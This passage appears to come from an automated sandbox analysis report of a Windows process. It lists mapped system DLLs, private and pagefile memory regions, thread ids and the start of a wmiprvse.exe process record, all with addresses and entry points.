0x7ff83ee49260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 568 start_va = 0x7ff83ee60000 end_va = 0x7ff83ef10fff monitored = 0 entry_point = 0x7ff83eed88b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 569 start_va = 0x7ff83f1a0000 end_va = 0x7ff83f1e1fff monitored = 0 entry_point = 0x7ff83f1a3670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 570 start_va = 0x7ff83f200000 end_va = 0x7ff83f266fff monitored = 0 entry_point = 0x7ff83f21e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 571 start_va = 0x7ff83f390000 end_va = 0x7ff83f39afff monitored = 0 entry_point = 0x7ff83f391d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 572 start_va = 0x7ff83f3f0000 end_va = 0x7ff83f407fff monitored = 0 entry_point = 0x7ff83f3f5910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 573 start_va = 0x7ff83f410000 end_va = 0x7ff83f434fff monitored = 0 entry_point = 0x7ff83f422f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 574 start_va = 0x7ff83f440000 end_va = 0x7ff83f450fff monitored = 0 entry_point = 0x7ff83f447ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 575 start_va = 0x7ff83f460000 end_va = 0x7ff83f479fff monitored = 0 entry_point = 0x7ff83f462cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 576 start_va = 0x7ff83f4e0000 end_va = 0x7ff83f534fff monitored = 0 entry_point = 0x7ff83f4e3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 577 start_va = 0x7ff83f540000 end_va = 0x7ff83f576fff monitored = 0 entry_point = 0x7ff83f546020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 578 start_va = 0x7ff83f580000 end_va = 0x7ff83f58bfff monitored = 0 entry_point = 0x7ff83f5814d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 579 start_va = 0x7ff83f590000 end_va = 0x7ff83f5affff monitored = 0 entry_point = 0x7ff83f5939a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 580 start_va = 0x7ff83f5c0000 end_va = 0x7ff83f687fff monitored = 0 entry_point = 0x7ff83f6013f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 581 start_va = 0x7ff83f690000 end_va = 0x7ff83f6f0fff monitored = 0 entry_point = 0x7ff83f694b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 582 start_va = 0x7ff83f700000 end_va = 0x7ff83f87bfff monitored = 0 entry_point = 0x7ff83f751650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 583 start_va = 0x7ff83f880000 end_va = 0x7ff83f88afff monitored = 0 entry_point = 0x7ff83f881770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 584 start_va = 0x7ff83f890000 end_va = 0x7ff83f8f3fff monitored = 0 entry_point = 0x7ff83f8a5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 585 start_va = 0x7ff83fac0000 end_va = 0x7ff83facbfff monitored = 0 entry_point = 0x7ff83fac2830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 586 start_va = 0x7ff83fb60000 end_va = 0x7ff83fbf1fff monitored = 0 entry_point = 0x7ff83fbaa780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 587 start_va = 0x7ff83fc80000 end_va = 0x7ff83fc90fff monitored = 0 entry_point = 0x7ff83fc87480 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 588 start_va = 0x7ff83fd10000 end_va = 0x7ff83fd45fff monitored = 0 entry_point = 0x7ff83fd20070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 589 start_va = 0x7ff840560000 end_va = 0x7ff84059ffff monitored = 0 entry_point = 0x7ff840576c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 590 start_va = 0x7ff8410a0000 end_va = 0x7ff841118fff monitored = 0 entry_point = 0x7ff8410bfb90 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 591 start_va = 0x7ff841120000 end_va = 0x7ff841127fff monitored = 0 entry_point = 0x7ff8411213e0 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 592 start_va = 0x7ff841160000 end_va = 0x7ff84119ffff monitored = 0 entry_point = 0x7ff841171960 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 593 start_va = 0x7ff841250000 end_va = 0x7ff841266fff monitored = 0 entry_point = 0x7ff841256620 region_type = mapped_file name = "msauserext.dll" filename = "\\Windows\\System32\\msauserext.dll" (normalized: "c:\\windows\\system32\\msauserext.dll") Region: id = 594 start_va = 0x7ff8413b0000 end_va = 0x7ff8413d6fff monitored = 0 entry_point = 0x7ff8413b7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 595 start_va = 0x7ff8413e0000 end_va = 0x7ff841489fff monitored = 0 entry_point = 0x7ff841407910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 596 start_va = 0x7ff841490000 end_va = 0x7ff84158ffff monitored = 0 entry_point = 0x7ff8414d0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 597 start_va = 0x7ff841620000 end_va = 0x7ff84162bfff monitored = 0 entry_point = 0x7ff841622480 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 598 start_va = 0x7ff8417f0000 end_va = 0x7ff841821fff monitored = 0 entry_point = 0x7ff841802340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 599 start_va = 0x7ff841960000 end_va = 0x7ff84196bfff monitored = 0 entry_point = 0x7ff841962790 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 600 start_va = 0x7ff841970000 end_va = 0x7ff841993fff monitored = 0 entry_point = 0x7ff841973260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 601 start_va = 0x7ff841b10000 end_va = 0x7ff841c03fff monitored = 0 entry_point = 0x7ff841b1a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 602 start_va = 0x7ff841c60000 end_va = 0x7ff841ca8fff monitored = 0 entry_point = 0x7ff841c6a090 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 603 start_va = 0x7ff841d80000 end_va = 0x7ff841d8bfff monitored = 0 entry_point = 0x7ff841d827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 604 start_va = 0x7ff841e60000 end_va = 0x7ff841e90fff monitored = 0 entry_point = 0x7ff841e67d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 605 start_va = 0x7ff841ec0000 end_va = 0x7ff841f39fff monitored = 0 entry_point = 0x7ff841ee1a50 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 606 start_va = 0x7ff841f80000 end_va = 0x7ff841fb3fff monitored = 0 entry_point = 0x7ff841f9ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 607 start_va = 0x7ff841fc0000 end_va = 0x7ff841fc9fff monitored = 0 entry_point = 0x7ff841fc1830 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 608 start_va = 0x7ff8420d0000 end_va = 0x7ff8420eefff monitored = 0 entry_point = 0x7ff8420d5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 609 start_va = 0x7ff842240000 end_va = 0x7ff84229bfff monitored = 0 entry_point = 0x7ff842256f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 610 start_va = 0x7ff8422f0000 end_va = 0x7ff842306fff monitored = 0 entry_point = 0x7ff8422f79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 611 start_va = 0x7ff842410000 end_va = 0x7ff84241afff monitored = 0 entry_point = 0x7ff8424119a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 612 start_va = 0x7ff842450000 end_va = 0x7ff842470fff monitored = 0 entry_point = 0x7ff842460250 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 613 start_va = 0x7ff8424a0000 end_va = 0x7ff8424f5fff monitored = 0 entry_point = 0x7ff8424b0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 614 start_va = 0x7ff842500000 end_va = 0x7ff842539fff monitored = 0 entry_point = 0x7ff842508d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 615 start_va = 0x7ff842540000 end_va = 0x7ff842566fff monitored = 0 entry_point = 0x7ff842550aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 616 start_va = 0x7ff842650000 end_va = 0x7ff84267cfff monitored = 0 entry_point = 0x7ff842669d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 617 start_va = 0x7ff8427e0000 end_va = 0x7ff8427f8fff monitored = 0 entry_point = 0x7ff8427e5e10 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 618 start_va = 0x7ff842800000 end_va = 0x7ff842828fff monitored = 0 entry_point = 0x7ff842814530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 619 start_va = 0x7ff842830000 end_va = 0x7ff8428c8fff monitored = 0 entry_point = 0x7ff84285f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 620 start_va = 0x7ff842970000 end_va = 0x7ff8429bafff monitored = 0 entry_point = 0x7ff8429735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 621 start_va = 0x7ff8429c0000 end_va = 0x7ff8429d3fff monitored = 0 entry_point = 0x7ff8429c52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 622 start_va = 0x7ff8429e0000 end_va = 0x7ff8429eefff monitored = 0 entry_point = 0x7ff8429e3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 623 start_va = 0x7ff8429f0000 end_va = 0x7ff8429fffff monitored = 0 entry_point = 0x7ff8429f56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 624 start_va = 0x7ff842a00000 end_va = 0x7ff842a69fff monitored = 0 entry_point = 0x7ff842a36d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 625 start_va = 0x7ff842a70000 end_va = 0x7ff842af5fff monitored = 0 entry_point = 0x7ff842a7d8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 626 start_va = 0x7ff842b00000 end_va = 0x7ff842b54fff monitored = 0 entry_point = 0x7ff842b17970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 627 start_va = 0x7ff842b60000 end_va = 0x7ff842b76fff monitored = 0 entry_point = 0x7ff842b61390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 628 start_va = 0x7ff842b80000 end_va = 0x7ff842d67fff monitored = 0 entry_point = 0x7ff842baba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 629 start_va = 0x7ff842e20000 end_va = 0x7ff842e62fff monitored = 0 entry_point = 0x7ff842e34b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 630 start_va = 0x7ff842e70000 end_va = 0x7ff8434b3fff monitored = 0 entry_point = 0x7ff8430364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 631 start_va = 0x7ff8434c0000 end_va = 0x7ff843686fff monitored = 0 entry_point = 0x7ff84351db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 632 start_va = 0x7ff843690000 end_va = 0x7ff843744fff monitored = 0 entry_point = 0x7ff8436d22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 633 start_va = 0x7ff843750000 end_va = 0x7ff844caefff monitored = 0 entry_point = 0x7ff8438b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 634 start_va = 0x7ff844cb0000 end_va = 0x7ff844d5cfff monitored = 0 entry_point = 0x7ff844cc81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 635 start_va = 0x7ff844d60000 end_va = 0x7ff844e7bfff monitored = 0 entry_point = 0x7ff844da02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 636 start_va = 0x7ff844f90000 end_va = 0x7ff8450e5fff monitored = 0 entry_point = 0x7ff844f9a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 637 start_va = 0x7ff845250000 end_va = 0x7ff845257fff monitored = 0 entry_point = 0x7ff845251ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 638 start_va = 0x7ff845260000 end_va = 0x7ff8453e5fff monitored = 0 entry_point = 0x7ff8452affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 639 start_va = 0x7ff845400000 end_va = 0x7ff8454a6fff monitored = 0 entry_point = 0x7ff84540b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 640 start_va = 0x7ff8454b0000 end_va = 0x7ff8458d8fff monitored = 0 entry_point = 0x7ff8454d8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 641 start_va = 0x7ff845950000 end_va = 0x7ff8459a1fff monitored = 0 entry_point = 0x7ff84595f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 642 start_va = 0x7ff8459b0000 end_va = 0x7ff845a0bfff monitored = 0 entry_point = 0x7ff8459cb720 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 643 start_va = 0x7ff845a10000 end_va = 0x7ff845a6afff monitored = 0 entry_point = 0x7ff845a238b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 644 start_va = 0x7ff845a70000 end_va = 0x7ff845b16fff monitored = 0 entry_point = 0x7ff845a858d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 645 start_va = 0x7ff845b20000 end_va = 0x7ff845be0fff monitored = 0 entry_point = 0x7ff845b40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 646 start_va = 0x7ff845da0000 end_va = 0x7ff845e3cfff monitored = 0 entry_point = 0x7ff845da78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 647 start_va = 0x7ff845e50000 end_va = 0x7ff845ebafff monitored = 0 entry_point = 0x7ff845e690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 648 start_va = 0x7ff845f80000 end_va = 0x7ff8461fcfff monitored = 0 entry_point = 0x7ff846054970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 649 start_va = 0x7ff846200000 end_va = 0x7ff846342fff monitored = 0 entry_point = 0x7ff846228210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 650 start_va = 0x7ff846350000 end_va = 0x7ff846510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 651 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 884 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 885 start_va = 0x6a00000 end_va = 0x6afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006a00000" filename = "" Region: id = 886 start_va = 0x7100000 end_va = 0x71fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007100000" filename = "" Region: id = 887 start_va = 0x7200000 end_va = 0x72fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007200000" filename = "" Region: id = 888 start_va = 0x7ff83fad0000 end_va = 0x7ff83fb19fff monitored = 0 entry_point = 0x7ff83fadac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 889 start_va = 0x160000 end_va = 0x160fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 923 start_va = 0xc20000 end_va = 0xc21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 924 start_va = 0xc20000 end_va = 0xc21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 930 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 931 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 958 start_va = 0x7a00000 end_va = 0x7afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007a00000" filename = "" Region: id = 1943 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5677 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5678 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 5679 start_va = 0x7c00000 end_va = 0x7cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007c00000" filename = "" Region: id = 5739 start_va = 0x7d00000 end_va = 0x7dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007d00000" filename = "" Region: id = 5740 start_va = 0x7e00000 end_va = 0x7efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000007e00000" filename = "" Region: id = 5742 start_va = 0x160000 end_va = 0x162fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 5743 start_va = 0x190000 end_va = 0x191fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 5744 start_va = 0x1f0000 end_va = 0x1f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 5745 start_va = 0xc20000 end_va = 0xc22fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 5746 start_va = 0xc20000 end_va = 0xc21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Thread: id = 6 os_tid = 0xb90 Thread: id = 7 os_tid = 0xcc4 Thread: id = 8 os_tid = 0x13b8 Thread: id = 9 os_tid = 0x13b4 Thread: id = 10 os_tid = 0x12e8 Thread: id = 11 os_tid = 0x6d0 Thread: id = 12 os_tid = 0x6d4 Thread: id = 13 os_tid = 0x6ec Thread: id = 14 os_tid = 0xbf0 Thread: id = 15 os_tid = 0x638 Thread: id = 16 os_tid = 0x528 Thread: id = 17 os_tid = 0xbbc Thread: id = 18 os_tid = 0x5e4 Thread: id = 19 os_tid = 0x174 Thread: id = 20 os_tid = 0x1cc Thread: id = 21 os_tid = 0xc14 Thread: id = 22 os_tid = 0x464 Thread: id = 23 os_tid = 0xe74 Thread: id = 24 os_tid = 0xcd0 Thread: id = 25 os_tid = 0xbd8 Thread: id = 26 os_tid = 0xed4 Thread: id = 27 os_tid = 0xe44 Thread: id = 28 os_tid = 0xe48 Thread: id = 29 os_tid = 0xe24 Thread: id = 30 os_tid = 0xe3c Thread: id = 31 os_tid = 0xe64 Thread: id = 32 os_tid = 0xe60 Thread: id = 33 os_tid = 0xe54 Thread: id = 34 os_tid = 0x7b4 Thread: id = 35 os_tid = 0xc50 Thread: id = 36 os_tid = 0xc68 Thread: id = 37 os_tid = 0xc60 Thread: id = 38 os_tid = 0xc64 Thread: id = 39 os_tid = 0xc58 Thread: id = 40 os_tid = 0xc5c Thread: id = 41 os_tid = 0xe00 Thread: id = 42 os_tid = 0xdac Thread: id = 43 os_tid = 0xd98 Thread: id = 44 os_tid = 0x76c Thread: id = 45 os_tid = 0xd84 Thread: id = 46 os_tid = 0xd80 Thread: id = 47 os_tid = 0x630 Thread: id = 48 os_tid = 0x7d8 Thread: id = 49 os_tid = 0xd28 Thread: id = 50 os_tid = 0xc80 Thread: id = 51 os_tid = 0x7f4 Thread: id = 52 os_tid = 0x48c Thread: id = 53 os_tid = 0xd30 Thread: id = 54 os_tid = 0x760 Thread: id = 55 os_tid = 0x268 Thread: id = 56 os_tid = 0x778 Thread: id = 57 os_tid = 0x774 Thread: id = 58 os_tid = 0x744 Thread: id = 59 os_tid = 0x730 Thread: id = 60 os_tid = 0x72c Thread: id = 61 os_tid = 0x6f0 Thread: id = 62 os_tid = 0x6e0 Thread: id = 63 os_tid = 0x6c8 Thread: id = 64 os_tid = 0x6c0 Thread: id = 65 os_tid = 0x6b0 Thread: id = 66 os_tid = 0x674 Thread: id = 67 os_tid = 0x63c Thread: id = 68 os_tid = 0x604 Thread: id = 69 os_tid = 0x5f4 Thread: id = 70 os_tid = 0x5bc Thread: id = 71 os_tid = 0x590 Thread: id = 72 os_tid = 0x58c Thread: id = 73 os_tid = 0x578 Thread: id = 74 os_tid = 0x534 Thread: id = 75 os_tid = 0x51c Thread: id = 76 os_tid = 0x4c4 Thread: id = 77 os_tid = 0x4c0 Thread: id = 78 os_tid = 0x450 Thread: id = 79 os_tid = 0x44c Thread: id = 80 os_tid = 0x448 Thread: id = 81 os_tid = 0x444 Thread: id = 82 os_tid = 0x130 Thread: id = 83 os_tid = 0x318 Thread: id = 84 os_tid = 0x188 Thread: id = 85 os_tid = 0x3c0 Thread: id = 86 os_tid = 0x3bc Thread: id = 87 os_tid = 0x340 Thread: id = 88 os_tid = 0x9c0 Thread: id = 113 os_tid = 0xbfc Thread: id = 114 os_tid = 0x9bc Thread: id = 115 os_tid = 0xcc0 Thread: id = 116 os_tid = 0x3a8 Thread: id = 128 os_tid = 0x1d8 Thread: id = 151 os_tid = 0xeb8 Thread: id = 163 os_tid = 0x298 Thread: id = 167 os_tid = 0x104c Thread: id = 168 os_tid = 0x1050 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61363000" os_pid = "0xfcc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x27c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT 